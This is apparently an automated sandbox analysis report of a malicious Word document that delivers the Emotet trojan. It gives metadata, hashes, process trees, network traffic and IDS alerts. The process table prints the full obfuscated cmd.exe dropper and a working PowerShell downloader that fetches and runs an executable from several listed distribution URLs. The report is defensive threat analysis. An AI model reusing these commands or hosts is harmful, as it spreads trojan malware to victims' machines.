File name: | b41e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc |
Full analysis: | https://app.any.run/tasks/1a5284c1-1742-49fd-a26f-70703bdbc2be |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 10:28:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jocelyn, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 06:29:00 2018, Last Saved Time/Date: Wed Nov 14 06:29:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | EA0FA7E60123C8D84A4DADED110D52A1 |
SHA1: | 2771F2121C4AC618F6AC6E32F9FA551E7CEFD3E1 |
SHA256: | B41E885B8EAFE1B77CAF3FB2184ABB636002DD49135DDD3D96F331558211805F |
SSDEEP: | 1536:vJK+lhLocn1kp59gxBK85fBt+a9Vjduedt9+d5paxyN9:vJbla41k/W48/jduedt9+d5paxyP |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Jocelyn |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 06:29:00 |
ModifyDate: | 2018:11:14 06:29:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3636 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b41e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1728 | cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3880 | powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2064 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3496 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | JQi.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
1712 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | JQi.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2524 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3033.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZUBHI2597HYVD0HQAFGQ.temp | — | |
MD5:— | SHA256:— | |||
3636 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1556C5F0148ADC12C233F60BEA416A8F | SHA256:DD1E17D0FEB54E5AD3CBDBD765C12F8E1B02DC979FB7748C6160EF5F0EEBE1F5 | |||
3636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$1e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc | pgc | |
MD5:0D3388A7F55C7F69D2270E1EF1B8C1A9 | SHA256:245CAD038B5C6FFA9DD2F6AE9254D5629AC215C27F6570EED3ED78C6033B397C | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3496 | JQi.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:A03F30CC8D3DF70C4BD8BC7EF100806A | SHA256:B2C5E2CE8D94D854F39B418AFDBB373E1CF9E40D273046255350366E177156B9 | |||
3880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JQi.exe | executable | |
MD5:A03F30CC8D3DF70C4BD8BC7EF100806A | SHA256:B2C5E2CE8D94D854F39B418AFDBB373E1CF9E40D273046255350366E177156B9 | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183b3f.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3636 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3880 | powershell.exe | GET | 200 | 103.81.85.177:80 | http://duhocgtc.com/lqtp/ | VN | executable | 448 Kb | malicious |
— | — | GET | 200 | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | binary | 148 b | malicious |
3880 | powershell.exe | GET | 301 | 103.81.85.177:80 | http://duhocgtc.com/lqtp | VN | html | 672 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3880 | powershell.exe | 103.81.85.177:80 | duhocgtc.com | The Corporation for Financing & Promoting Technology | VN | suspicious |
2524 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
duhocgtc.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3880 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3880 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3880 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2524 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |